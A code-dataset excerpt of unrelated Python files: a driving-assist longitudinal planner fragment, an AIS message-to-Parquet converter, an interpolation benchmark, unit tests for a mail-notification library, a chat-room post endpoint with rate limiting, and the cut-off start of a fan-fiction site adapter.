v_ego, sm['carState'].aEgo,
lead_1.dRel, lead_1.vLead, lead_1.aLeadK,
lead_1.yRel, lead_1.vLat,
lead_1.fcw, blinkers) and not sm['carState'].brakePressed
if self.fcw:
cloudlog.info("FCW triggered %s", self.fcw_checker.counters)
# Interpolate 0.05 seconds and save as starting point for next iteration
a_acc_sol = self.a_acc_start + (CP.radarTimeStep / LON_MPC_STEP) * (self.a_acc - self.a_acc_start)
v_acc_sol = self.v_acc_start + CP.radarTimeStep * (a_acc_sol + self.a_acc_start) / 2.0
self.v_acc_next = v_acc_sol
self.a_acc_next = a_acc_sol
self.first_loop = False
def publish(self, sm, pm):
self.mpc1.publish(pm)
self.mpc2.publish(pm)
plan_send = messaging.new_message('longitudinalPlan')
plan_send.valid = sm.all_alive_and_valid(service_list=['carState', 'controlsState', 'radarState'])
longitudinalPlan = plan_send.longitudinalPlan
longitudinalPlan.mdMonoTime = sm.logMonoTime['modelV2']
longitudinalPlan.radarStateMonoTime = sm.logMonoTime['radarState']
longitudinalPlan.vCruise = float(self.v_cruise)
longitudinalPlan.aCruise = float(self.a_cruise)
longitudinalPlan.vStart = float(self.v_acc_start)
longitudinalPlan.aStart = float(self.a_acc_start)
longitudinalPlan.vTarget = float(self.v_acc)
longitudinalPlan.aTarget = float(self.a_acc)
longitudinalPlan.vTargetFuture = float(self.v_acc_future)
longitudinalPlan.hasLead = self.mpc1.prev_lead_status
longitudinalPlan.longitudinalPlanSource = self.longitudinalPlanSource
longitudinalPlan.fcw = self.fcw
longitudinalPlan.processingDelay = (plan_send.logMonoTime / 1e9) - sm.rcv_time['radarState']
# Send radarstate(dRel, vRel, yRel)
lead_1 = sm['radarState'].leadOne
lead_2 = sm['radarState'].leadTwo
longitudinalPlan.dRel1 = float(lead_1.dRel)
longitudinalPlan.yRel1 = float(lead_1.yRel)
longitudinalPlan.vRel1 = float(lead_1.vRel)
longitudinalPlan.dRel2 = float(lead_2.dRel)
longitudinalPlan.yRel2 = float(lead_2.yRel)
longitudinalPlan.vRel2 = float(lead_2.vRel)
longitudinalPlan.status2 = bool(lead_2.status)
cam_distance_calc = 0
cam_distance_calc = interp(self.vego*CV.MS_TO_KPH, [30,60,100,160], [3.75,5.5,6,7])
consider_speed = interp((self.vego*CV.MS_TO_KPH - self.target_speed_map), [10, 30], [1, 1.3])
if self.target_speed_map > 29 and self.target_speed_map_dist < cam_distance_calc*consider_speed*self.vego*CV.MS_TO_KPH:
longitudinalPlan.targetSpeedCamera = float(self.target_speed_map)
longitudinalPlan.targetSpeedCameraDist = float(self.target_speed_map_dist)
self.target_speed_map_sign = True
elif self.target_speed_map > 29 and self.target_speed_map_dist >= cam_distance_calc*consider_speed*self.vego*CV.MS_TO_KPH and self.target_speed_map_block:
longitudinalPlan.targetSpeedCamera = float(self.target_speed_map)
longitudinalPlan.targetSpeedCameraDist = float(self.target_speed_map_dist)
self.target_speed_map_sign = True
elif self.target_speed_map > 29 and self.target_speed_map_sign:
longitudinalPlan.targetSpeedCamera = float(self.target_speed_map)
longitudinalPlan.targetSpeedCameraDist = float(self.target_speed_map_dist)
else:
longitudinalPlan.targetSpeedCamera = 0
longitudinalPlan.targetSpeedCameraDist = 0
pm.send('longitudinalPlan', plan_send)
| 43.480447 | 177 | 0.694398 |
69d44e9ba33a7bea0e21c95a8206937d081cf54d | 6,905 | py | Python | archivetoparquet.py | ScottSyms/AISArchive | eee55b97d6010679c30bb00601827ba04a91faf5 | [
"BSD-2-Clause"
] | null | null | null | archivetoparquet.py | ScottSyms/AISArchive | eee55b97d6010679c30bb00601827ba04a91faf5 | [
"BSD-2-Clause"
] | null | null | null | archivetoparquet.py | ScottSyms/AISArchive | eee55b97d6010679c30bb00601827ba04a91faf5 | [
"BSD-2-Clause"
] | null | null | null | import pandas as pd
from bitstring import BitString
import pyarrow
import pyarrow.parquet as pq
import numpy as np
import sys
# Constants
lookupstring = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ !\"#$%&\\()*+,-./0123456789:;<=>?"
def convertPayload(string):
"""
AIS payloads are encoded in six bit ascii. This converts the payload into
ASCII for further processing.
"""
binword = ''
for piece in str(string):
# Subtract 48 from the ascii value.
# If the value is greater than 40, subtract 8
ascii_piece = ord(piece) - 48
if ascii_piece > 40:
ascii_piece = ascii_piece - 8
# to convert the string to binary.
for x in [32, 16, 8, 4, 2, 1]:
if ascii_piece - x >= 0:
ascii_piece = ascii_piece - x
binword = binword + '1'
else:
binword = binword + '0'
return binword
def getMessageType(row):
    """Return the AIS message type: the first six bits of the binary payload."""
    bits = BitString(bin=row['binpayload'])
    return bits[:6].uint
def getMMSI(row):
    """Return the vessel MMSI (bits 8-37), zero-padded to 9 digits."""
    bits = BitString(bin=row['binpayload'])
    return str(bits[8:38].uint).zfill(9)
def getLongitude(row):
    """Extract longitude in degrees from the binary payload.

    Bit offsets depend on the message type; unknown types yield None.
    The raw field is a signed integer in 1/600000 degree units.
    """
    # messagetype -> (start bit, end bit) of the longitude field.
    field_bits = {
        1: (61, 89), 2: (61, 89), 3: (61, 89), 9: (61, 89),
        4: (79, 107),
        18: (57, 85), 19: (57, 85),
        21: (164, 192),
        27: (44, 62),
    }
    bounds = field_bits.get(row['messagetype'])
    if bounds is None:
        return None
    payload = BitString(bin=row['binpayload'])
    # Pad so short payloads still satisfy the largest slice.
    payload = payload + \
        BitString('0x000000000000000000000000000000000000000000000000000')
    start, end = bounds
    return float(payload[start:end].int) / 600000
def getLatitude(row):
    """Extract latitude in degrees from the binary payload.

    Bit offsets depend on the message type; unknown types yield None.
    The raw field is a signed integer in 1/600000 degree units.
    """
    # messagetype -> (start bit, end bit) of the latitude field.
    field_bits = {
        1: (89, 116), 2: (89, 116), 3: (89, 116), 9: (89, 116),
        4: (107, 134),
        18: (85, 112), 19: (85, 112),
        21: (192, 219),
        27: (62, 79),
    }
    bounds = field_bits.get(row['messagetype'])
    if bounds is None:
        return None
    payload = BitString(bin=row['binpayload'])
    # Pad so short payloads still satisfy the largest slice.
    payload = payload + \
        BitString('0x100000000000000000000000000000000000000000000000000')
    start, end = bounds
    return float(payload[start:end].int) / 600000
def returnAscii(x):
    """Map a 6-bit value back to its payload character (inverse of encoding)."""
    code = x + 48
    if code > 31:
        code += 8
    return chr(code)
def clean(data):
    """Uppercase *data* and drop any character outside the six-bit alphabet."""
    kept = [ch for ch in data.upper() if ch in lookupstring]
    return ''.join(kept)
def converttoString(payload):
    '''
    Convert from sixbit ascii to text

    *payload* is a string of '0'/'1' bits; it is read six bits at a time and
    each value is looked up in the six-bit alphabet. Trailing '@' padding is
    stripped and the result is passed through clean().
    '''
    # Local copy of the alphabet (shadows the module-level constant).
    lookupstring = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ !\"#$%&\\()*+,-./0123456789:;<=>?"
    length = len(payload)
    # Hex padding guarantees read("uint:6") does not run out mid-character.
    payload = BitString(
        bin=payload) + BitString('0x00000000000000000000000000000000000000000000000000000')
    word = ''
    while True:
        try:
            snip = payload.read("uint:6")
        # NOTE(review): bare except doubles as the loop terminator when the
        # stream is exhausted -- it also hides any other error. Confirm intent.
        except:
            return clean(word.replace('@', '').strip())
        # NOTE(review): snip is an int, so snip == '' is always False; the
        # real stop condition is reaching the original (unpadded) length.
        if snip == '' or payload.pos == length:
            return clean(word.replace('@', '').strip())
        else:
            word = word + lookupstring[snip]
def getDestination(payload):
    """Type-5 voyage data: decode the destination field (bits 302-421)."""
    field = payload[302:422]
    return converttoString(field)
def getShipname(payload):
    """Type-5 voyage data: decode the ship name field (bits 112-231)."""
    field = payload[112:232]
    return converttoString(field)
def getCallsign(payload):
    """Type-5 voyage data: decode the call sign field (bits 70-111)."""
    field = payload[70:112]
    return converttoString(field)
# --- Main pipeline ---------------------------------------------------------
# Usage: archivetoparquet.py <output parquet dir> <input archive file>
# Each input line is "<tag block>!<AIVDM sentence>"; '!' splits them apart.
print("\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
print("Reading the data from ", sys.argv[2])
df = pd.read_csv(sys.argv[2], delimiter='!',
                 header=0, names=['prefix', 'suffix'])

print("Extracting the payload")
df['payload'] = df.suffix.str.extract(
    r'AIVDM,\w*,\w*,\w*,\w*,([A-Za-z0-9:;<=>=?@`]+)')

print("Converting the payload to binary")
df['binpayload'] = df.payload.apply(convertPayload)

print("Getting the message type")
df['messagetype'] = df.apply(lambda x: getMessageType(x), axis=1)

print("Getting the MMSI")
df['mmsi'] = df.apply(lambda x: getMMSI(x), axis=1)

print("Getting the longitude and latitude")
df['longitude'] = df.apply(lambda x: getLongitude(x), axis=1)
df['latitude'] = df.apply(lambda x: getLatitude(x), axis=1)

print("extracting the received and reported time")
try:
    # Leading digits of the tag block are the receive timestamp (epoch secs).
    df['received_time'] = df.prefix.str.extract(r'(^[\d]*)')
    df['received_time'] = df.received_time.apply(
        lambda x: pd.Timestamp(int(x), unit='s', tz="UTC"))
# NOTE(review): bare except drops received_time entirely on any parse error.
except:
    pass
# "c:<secs>" in the tag block is the reported time; missing values become epoch 0.
df['report_time'] = df.prefix.str.extract(r'c:(\d+)')
df['report_time'] = df.report_time.apply(lambda x: x if pd.isna(
    x) else pd.Timestamp(int(x), unit='s', tz="UTC"))
value = pd.Timestamp(0, unit='s', tz='UTC')
df.report_time.fillna(value, inplace=True)

print("Extracting sentence, group, fragment data and padding value")
df['source'] = df.prefix.str.extract(r's:(\w*)')
df['group'] = df.prefix.str.extract(r'g:([A-Za-z0-9-]+)')
df['fragments'] = df.suffix.str.extract(r'AIVDM,(\w*)')
df['fragment'] = df.suffix.str.extract(r'AIVDM,\w*,(\w*)')
df['fragmentid'] = df.suffix.str.extract(r'AIVDM,\w*,\w*,(\w*)')
df['frequency'] = df.suffix.str.extract(r'AIVDM,\w*,\w*,\w*,(\w*)')
df['padding'] = df.suffix.str.extract(r',(\d+)\*')

print("Appending second fragment")
# Two-part messages are joined on mmsi+group, concatenating the bit payloads.
df['merge'] = df['mmsi'] + df['group']
seconds = df.query("fragments == '2' and fragment=='2'")[
    ['merge', 'binpayload']]
df = df.merge(seconds, on='merge', how='outer')
df['binpayload'] = np.where(
    pd.isna(df.binpayload_y), df.binpayload_x, df.binpayload_x + df.binpayload_y)

print("Removing second fragment")
df.drop(df[df.fragment == '2'].index, inplace=True)

# NOTE(review): messagetype comes back from getMessageType() as an int, so
# querying against the string '5' may match nothing -- confirm on real data.
print("Adding destination")
df['destination'] = df.query("messagetype == '5'").binpayload.apply(
    lambda x: getDestination(x))

print("Adding callsign")
df['callsign'] = df.query("messagetype == '5'").binpayload.apply(
    lambda x: getCallsign(x))

print("Adding adding ship name")
df['shipname'] = df.query("messagetype == '5'").binpayload.apply(
    lambda x: getShipname(x))

print('Create date values to partition on')
df['year'] = df.report_time.apply(lambda x: int(x.year))
df['month'] = df.report_time.apply(lambda x: int(x.month))
df['day'] = df.report_time.apply(lambda x: int(x.day))
df['hour'] = df.report_time.apply(lambda x: int(x.hour))

print("Drop columns and save file")
df.drop(columns=['prefix', 'suffix', 'payload',
                 'binpayload_x', 'binpayload_y'], inplace=True)
table = pyarrow.Table.from_pandas(df)
pq.write_to_dataset(table, sys.argv[1], partition_cols=[
    'year', 'month', 'day', 'hour'], compression='snappy')
| 31.674312 | 91 | 0.623606 |
5f5bb022bda5a9f4a8732940f0eeae12e30dcdab | 1,071 | py | Python | examples/compare_1d.py | ndrwpvlv/sinterp | 5c4606e9b82bf703650d320c74005fa16c98cb23 | [
"MIT"
] | null | null | null | examples/compare_1d.py | ndrwpvlv/sinterp | 5c4606e9b82bf703650d320c74005fa16c98cb23 | [
"MIT"
] | null | null | null | examples/compare_1d.py | ndrwpvlv/sinterp | 5c4606e9b82bf703650d320c74005fa16c98cb23 | [
"MIT"
] | null | null | null | import random
import time
from numpy import interp
from sinterp import interp1d
times = [] # list with time of calculation
ratios = [] # ratio of calc with interp to interp1d
deltas = [] # summary delta of difference results by iteration
size = []
for kk in range(2, 5):
x1 = 0
x2 = int(10 ** kk)
size.append(x2)
xp = [float(_) for _ in range(x1, x2 + 1)]
yp = [_ ** 3.0 for _ in xp]
x = [random.uniform(float(x1), float(x2)) for _ in range(10000)]
start_time = time.time()
v_1 = [interp(_, xp, yp) for _ in x]
time_1 = time.time() - start_time
start_time = time.time()
v_2 = [interp1d(_, xp, yp) for _ in x]
time_2 = time.time() - start_time
times.append([time_1, time_2])
ratios.append(time_1 / time_2)
deltas.append(sum(_[1] - _[0] for _ in zip(v_1, v_2)))
# Print benchmark ratios
print('--- Benchmark results ---')
print('List size : Ratio')
for r, v in zip(size, ratios):
print(' %i : %f' % (r, v))
print('Check convergence. Difference between interp and interp1d = %f' % max(deltas))
| 26.121951 | 85 | 0.623716 |
02b1af15aa88e85c0dbc3efd257130f9c8c8bb47 | 12,680 | py | Python | test_notipy.py | nbryans/notipy | f925dcb97d0d4e5124e1f3d4d3a7ed3a0aa47bc7 | [
"MIT"
] | null | null | null | test_notipy.py | nbryans/notipy | f925dcb97d0d4e5124e1f3d4d3a7ed3a0aa47bc7 | [
"MIT"
] | null | null | null | test_notipy.py | nbryans/notipy | f925dcb97d0d4e5124e1f3d4d3a7ed3a0aa47bc7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import notipymail.notipy as notipy
import unittest
import time
import os
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
class TestUpdating(unittest.TestCase):
    """Tests for notipy's send-details configuration handling and its log.

    Importing testutil in setUpClass monkey-patches smtplib (see the matching
    comment in TestSendingMail) so no real mail is ever sent.
    """

    # Shared fixture values used across all tests.
    toAddr = "to@destination.com"
    toAddr2 = "to2@destination2.com"
    msg = "Test Message "
    sub = "test_subject"
    fromAddr = "from@here.com"
    fromPwd = "pwd"
    emailSer = "smtp.dummy.com"
    emailPort = 25
    alternateSendDetailsPath = "dummy.dat"

    @classmethod
    def setUpClass(self):
        import testutil
        # Resolve dummy.dat against the CWD (Windows-style separator).
        self.alternateSendDetailsPath = os.getcwd()+ "\\" + self.alternateSendDetailsPath
        self.required_keywords = notipy.required_keywords

    @classmethod
    def tearDownClass(self):
        import smtplib
        # Delete dummy sendDetails file

    def tearDown(self):
        time.sleep(0.03)
        # I've found that a small time delay between tests helps
        # prevent a sporadic test error where the OS can't open the
        # dummy.dat file in Python3

    def checkSendDetailsFile(self, toAddr, fromAddr, emailSer, emailPort, filePath=""):
        # Verify each "key: value" line of the details file against the class
        # fixtures. NOTE(review): the toAddr/fromAddr/emailSer/emailPort
        # parameters are never used -- the checks read the class attributes.
        if filePath == "":
            filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
        assert os.path.exists(filePath)
        with open(filePath) as fin:
            for line in fin:
                x = line.split(':')
                self.assertTrue(len(x) == 2)
                x[0] = x[0].strip()
                self.assertTrue(x[0] in self.required_keywords)
                shouldEqual = ""
                if x[0] == 'email':
                    shouldEqual = self.fromAddr
                elif x[0] == 'password':
                    shouldEqual = self.fromPwd
                elif x[0] == 'server':
                    shouldEqual = self.emailSer
                elif x[0] == 'port':
                    shouldEqual = str(self.emailPort)
                self.assertTrue(x[1].strip() == shouldEqual)

    def checkReadSendDetailsDict(self, readDict):
        # The dict returned by _readSendDetails must carry every required
        # keyword with the fixture values.
        for i in self.required_keywords:
            self.assertTrue(i in readDict.keys())
            if i == 'email':
                shouldEqual = self.fromAddr
            elif i == 'password':
                shouldEqual = self.fromPwd
            elif i == 'server':
                shouldEqual = self.emailSer
            elif i == 'port':
                shouldEqual = str(self.emailPort)
            self.assertTrue(readDict[i] == shouldEqual)

    def checkSendDetailsClear(self, filename):
        # Make sure we get MissingValueExceptions
        self.assertRaises(notipy.MissingValueException, notipy._readSendDetails)
        # Also, manually read the file to make sure NO values in it
        with open(filename, 'r') as fin:
            for line in fin:
                x = line.rstrip().split(':')
                self.assertTrue(len(x[1]) == 0)

    def checkLogEntry(self, entry, missValExcp=False, missConfigExcp=False, smtpExcp=False):
        # This will be used to check the contents in the log and make sure they're correct
        if missValExcp or missConfigExcp or smtpExcp:
            self.assertTrue("ERROR" in entry)
            if missValExcp:
                self.assertTrue("file must contain a key and value" in entry)
            elif missConfigExcp:
                self.assertTrue("You must provide a" in entry)
            elif smtpExcp:
                self.assertTrue("SMTPException caught" in entry)

    def checkLogMultiLine(self, entry, numLineQueried, numLineActual):
        # NOTE(review): numLineQueried/numLineActual are unused; only the
        # newline count of the queried text is bounded -- confirm intent.
        numNewLine = entry.count('\n')
        self.assertTrue(numNewLine <= 2)

    def test_updateSendDetails(self):
        """Writing details persists them to the default file."""
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
        self.checkSendDetailsFile(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)

    def test_updateSendDetailsNonDefaultFile(self):
        """Writing details honors an alternate details file path."""
        notipy.detailsFileName = self.alternateSendDetailsPath
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
        self.checkSendDetailsFile(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort, filePath=notipy.detailsFileName)
        notipy.detailsFileName = ""  # Cleanup

    def test_readSendDetails(self):
        """Round-trip: details written can be read back into a dict."""
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
        x = notipy._readSendDetails()
        self.checkReadSendDetailsDict(x)

    def test_readSendDetailsNonDefaultFile(self):
        """Round-trip through an alternate details file path."""
        notipy.detailsFileName = self.alternateSendDetailsPath
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
        x = notipy._readSendDetails()
        self.checkReadSendDetailsDict(x)
        notipy.detailsFileName = ""  # Cleanup

    def test_readIncompleteSendDetails(self):
        """A details file with empty or missing keys raises MissingValueException."""
        filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
        # Checking for exception with empty port value
        with open(filePath, 'w') as fin:
            fin.write('email:'+self.fromAddr+'\n')
            fin.write('password:'+self.fromPwd+'\n')
            fin.write('server:'+self.emailSer+'\n')
            fin.write('port:\n')
        self.assertRaises(notipy.MissingValueException, notipy._readSendDetails)
        # Checking for exception with missing pwd
        with open(filePath, 'w') as fin:
            fin.write('email:'+self.fromAddr+'\n')
            fin.write('server:'+self.emailSer+'\n')
            fin.write('port:'+str(self.emailPort)+'\n')
        self.assertRaises(notipy.MissingValueException, notipy._readSendDetails)
        # Cleanup
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)

    def test_readNoSendDetails(self):
        """A missing details file raises MissingConfigFileException."""
        filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
        os.remove(filePath)
        self.assertRaises(notipy.MissingConfigFileException, notipy._readSendDetails)
        # Cleanup
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)

    def test_clearSendDetails(self):
        """clearSendDetails blanks every value in the default details file."""
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
        notipy.clearSendDetails()
        filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
        self.checkSendDetailsClear(filePath)
        # Cleanup
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)

    def test_clearSendDetailsNonDefaultFile(self):
        """clearSendDetails also works on an alternate details file path."""
        notipy.detailsFileName = self.alternateSendDetailsPath
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
        notipy.clearSendDetails()
        self.checkSendDetailsClear(notipy.detailsFileName)
        notipy.detailsFileName = ""  # Cleanup

    def test_logFileMissingValueException(self):
        # Ensure the log file correctly logs a MissingValueException
        # Generate the Exception
        filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
        # Checking for exception with missing pwd
        with open(filePath, 'w') as fin:
            fin.write('email:'+self.fromAddr+'\n')
            fin.write('server:'+self.emailSer+'\n')
            fin.write('port:'+str(self.emailPort)+'\n')
        notipy.sendMail(self.toAddr, self.msg)
        out = StringIO()
        notipy.queryLog(1, out=out)
        output=out.getvalue().strip()
        self.checkLogEntry(output, missValExcp=True)
        notipy.clearLog()  # Cleanup

    def test_logFileMissingConfigFileException(self):
        # Ensure the log file correctly logs a MissingConfigFileException
        filePath = notipy.pkg.resource_filename('notipymail','data/senddetails.dat')
        os.remove(filePath)
        notipy.sendMail(self.toAddr, self.msg)
        out = StringIO()
        notipy.queryLog(1, out=out)
        output=out.getvalue().strip()
        self.checkLogEntry(output, missConfigExcp=True)
        notipy.clearLog()  # Cleanup

    def test_logFileSMTPException(self):
        # Make sure the log file correctly logs a SMTPException when it occurs
        # (the patched smtplib raises when the body is 'raise smtpexception').
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
        notipy.sendMail(self.toAddr, 'raise smtpexception')
        out = StringIO()
        notipy.queryLog(1, out=out)
        output=out.getvalue().strip()
        self.checkLogEntry(output, smtpExcp=True)
        notipy.clearLog()

    def test_queryLogExcess(self):
        # Make sure queryLog behaves correctly when we query more items from
        # the log than there are
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
        notipy.clearLog()
        notipy.sendMail(self.toAddr, self.msg)
        notipy.sendMail(self.toAddr, self.msg)
        out = StringIO()
        notipy.queryLog(3, out=out)
        output=out.getvalue().strip()
        self.checkLogMultiLine(output, 3, 2)
        notipy.clearLog()

    def test_clearLog(self):
        # Make sure the log is cleared correctly
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)
        notipy.sendMail(self.toAddr, self.msg)
        notipy.sendMail(self.toAddr, self.msg)
        notipy.clearLog()
        # Verify (manually) here that the log is cleared
        filePath = notipy.pkg.resource_filename('notipymail','data/notipy.log')
        self.assertTrue(os.stat(filePath).st_size == 0)

    def test_clearLogNonDefaultFile(self):
        # Make sure the log is cleared correctly when its in non-default location
        # Right now, to test this I need to change file name in notipy.py
        # and reload module. Change program behaviour to make this easier
        # to test
        pass
class TestSendingMail(unittest.TestCase):
    """Sends mail through the monkey-patched smtplib and checks the log."""

    # Shared fixture values used across all tests.
    toAddr = "to@destination.com"
    toAddr2 = "to2@destination2.com"
    msg = "Test Message "
    sub = "test_subject"
    fromAddr = "from@here.com"
    fromPwd = "pwd"
    emailSer = "smtp.dummy.com"
    emailPort = 25

    @classmethod
    def setUpClass(self):
        # Importing testutil installs the smtplib monkey patch.
        import testutil
        notipy.updateSendDetails(self.fromAddr, self.fromPwd, self.emailSer, self.emailPort)

    @classmethod
    def tearDownClass(self):
        import smtplib  # Clear Monkey Patch on smtplib
        notipy.clearSendDetails()

    def checkLogEntry(self, entry, subject=False, multRecipients=False):
        # This will be used to check the contents in the log and make sure they're correct
        # NOTE(review): the `subject` flag is accepted but never checked.
        self.assertTrue("Successfully sent mail to" in entry)
        self.assertTrue("INFO" in entry)
        self.assertTrue(self.toAddr in entry)
        if multRecipients:
            self.assertTrue(self.toAddr2 in entry)

    def test_sendMail(self):
        """A plain send is logged as successful."""
        msg = self.msg + "test_sendMail"
        notipy.sendMail(self.toAddr, msg)
        out = StringIO()
        notipy.queryLog(1, out=out)
        output = out.getvalue().strip()
        self.checkLogEntry(output)
        notipy.clearLog()

    def test_sendMailWithSubj(self):
        """A send with an explicit subject is logged as successful."""
        msg = self.msg + "test_sendMailWithSubj"
        notipy.sendMail(self.toAddr, msg, self.sub)
        out = StringIO()
        notipy.queryLog(1, out=out)
        output = out.getvalue().strip()
        self.checkLogEntry(output, subject=True)
        notipy.clearLog()

    def test_sendMailWithMultipleRecipients(self):
        """A comma-separated recipient list logs both addresses."""
        msg = self.msg + "test_sendMailWithMultipleRecipients"
        notipy.sendMail(self.toAddr+","+self.toAddr2, msg)
        out = StringIO()
        notipy.queryLog(1, out=out)
        output=out.getvalue().strip()
        self.checkLogEntry(output, multRecipients=True)
        notipy.clearLog()

    # Unsure how to test Async function at this time since
    # Monkey patch on the smtplib.SMTP does not carry over to
    # spawned processes
    # def test_sendMailAsync(self):
    # msg = self.msg + "test_sendMailAsync"
    # notipy.sendMailAsync(self.toAddr, msg)
    # time.sleep(5)
    # out = StringIO()
    # notipy.queryLog(1, out=out)
    # output = out.getvalue().strip()
    # print(output)
    # self.checkLogEntry(output)
    # notipy.clearLog()
    # def test_sendMailAsyncWithSubj(self):
    # msg = self.msg + "test_sendMailAsyncWithSubj"
    # notipy.sendMailAsync(self.toAddr, msg, self.sub)
    # time.sleep(5)
    # out = StringIO()
    # notipy.queryLog(1, out=out)
    # output = out.getvalue().strip()
    # print(output)
    # self.checkLogEntry(output, subject=True)
    # notipy.clearLog()
# Run the suite directly with `python test_notipy.py`.
if __name__ == '__main__':
    unittest.main()
f098ba3dedf95f7c8d57cacbe68543b9f09b8463 | 2,524 | py | Python | scripts/post.py | sebbASF/asfmm | ee93bf6fa617f74ba40bf4b2d3b6af70e873edf9 | [
"Apache-2.0"
] | null | null | null | scripts/post.py | sebbASF/asfmm | ee93bf6fa617f74ba40bf4b2d3b6af70e873edf9 | [
"Apache-2.0"
] | null | null | null | scripts/post.py | sebbASF/asfmm | ee93bf6fa617f74ba40bf4b2d3b6af70e873edf9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ahapi
import typing
import time
"""Post end point for MM"""
async def process(state: typing.Any, request, formdata: dict) -> typing.Any:
    """Handle a chat post: validate the session and sender, find the target
    room, apply flood control, and append the message.

    Returns a {"success": bool, "message": str} dict in every case.
    """
    session = state.cookies.get(request)  # None when no valid session exists
    if not session:
        return {"success": False, "message": "Oops, something went terribly wrong here!"}
    credentials = session.state["credentials"]
    sender = credentials["login"]
    realname = credentials["name"]
    message = formdata.get("message")
    roomname = formdata.get("room")

    # Blocked and banned senders are rejected before any room lookup.
    if sender in state.blocked or sender in state.banned:
        return {
            "success": False,
            "message": "You appear to be blocked from sending messages",
        }

    # Locate the first room whose name matches the request.
    target = None
    for candidate in state.rooms:
        if candidate.name == roomname:
            target = candidate
            break
    if target is None:
        return {
            "success": False,
            "message": "Could not find room!",
        }

    # Throttle: reject when the Nth-most-recent message (N = rate limit)
    # landed within the last second.
    throttle_max = state.config.get("message_rate_limit", 5)
    recent = target.flood_control
    if len(recent) >= throttle_max and recent[-throttle_max] >= time.time() - 1:
        return {
            "success": False,
            "message": "The chat is experiencing a large influx of messages and have been throttled. Please try again.",
        }

    target.add_message(sender, realname, message)
    # Record this message's timestamp for flood control, keeping at most 50.
    recent.append(time.time())
    if len(recent) > 50:
        recent.pop(0)
    return {
        "success": True,
        "message": "Message sent!",
    }
def register(state: typing.Any):
    """Server hook: expose process() as an ahapi endpoint."""
    return ahapi.endpoint(process)
| 39.4375 | 128 | 0.649762 |
d9d3133cc49bc0484d36245dd1584855b06f7e74 | 8,135 | py | Python | fanficfare/adapters/adapter_spikeluvercom.py | davidferguson/FanFicUpload | dcc3010b9c35c6d0e479cfc2aa07d951d280d9b2 | [
"Apache-2.0"
] | 1 | 2019-06-13T11:20:33.000Z | 2019-06-13T11:20:33.000Z | fanficfare/adapters/adapter_spikeluvercom.py | davidferguson/FanFicUpload | dcc3010b9c35c6d0e479cfc2aa07d951d280d9b2 | [
"Apache-2.0"
] | null | null | null | fanficfare/adapters/adapter_spikeluvercom.py | davidferguson/FanFicUpload | dcc3010b9c35c6d0e479cfc2aa07d951d280d9b2 | [
"Apache-2.0"
] | null | null | null | # Software: eFiction
import re
import urllib2
import urlparse
from bs4.element import Tag
from ..htmlcleanup import stripHTML
from base_adapter import BaseSiteAdapter, makeDate
from .. import exceptions
def getClass():
    """Adapter registry hook: fanficfare imports this to find the adapter class."""
    return SpikeluverComAdapter
# yields Tag _and_ NavigableString siblings from the given tag. The
# BeautifulSoup findNextSiblings() method for some reasons only returns either
# NavigableStrings _or_ Tag objects, not both.
def _yield_next_siblings(tag):
sibling = tag.nextSibling
while sibling:
yield sibling
sibling = sibling.nextSibling
class SpikeluverComAdapter(BaseSiteAdapter):
    """eFiction adapter for spikeluver.com (the SpuffyRealm archive)."""

    SITE_ABBREVIATION = 'slc'
    SITE_DOMAIN = 'spikeluver.com'
    BASE_URL = 'http://' + SITE_DOMAIN + '/SpuffyRealm/'
    LOGIN_URL = BASE_URL + 'user.php?action=login'
    # Canonical story URL; %d is the numeric story id.
    VIEW_STORY_URL_TEMPLATE = BASE_URL + 'viewstory.php?sid=%d'
    # Appended to a story URL to request the all-chapters metadata index.
    METADATA_URL_SUFFIX = '&index=1'
    # Appended to bypass the site's adult-content interstitial.
    AGE_CONSENT_URL_SUFFIX = '&ageconsent=ok&warning=5'
    DATETIME_FORMAT = '%m/%d/%Y'
    STORY_DOES_NOT_EXIST_ERROR_TEXT = 'That story does not exist on this archive. You may search for it or return to the home page.'
def __init__(self, config, url):
BaseSiteAdapter.__init__(self, config, url)
query_data = urlparse.parse_qs(self.parsedUrl.query)
story_id = query_data['sid'][0]
self.story.setMetadata('storyId', story_id)
self._setURL(self.VIEW_STORY_URL_TEMPLATE % int(story_id))
self.story.setMetadata('siteabbrev', self.SITE_ABBREVIATION)
def _customized_fetch_url(self, url, exception=None, parameters=None):
if exception:
try:
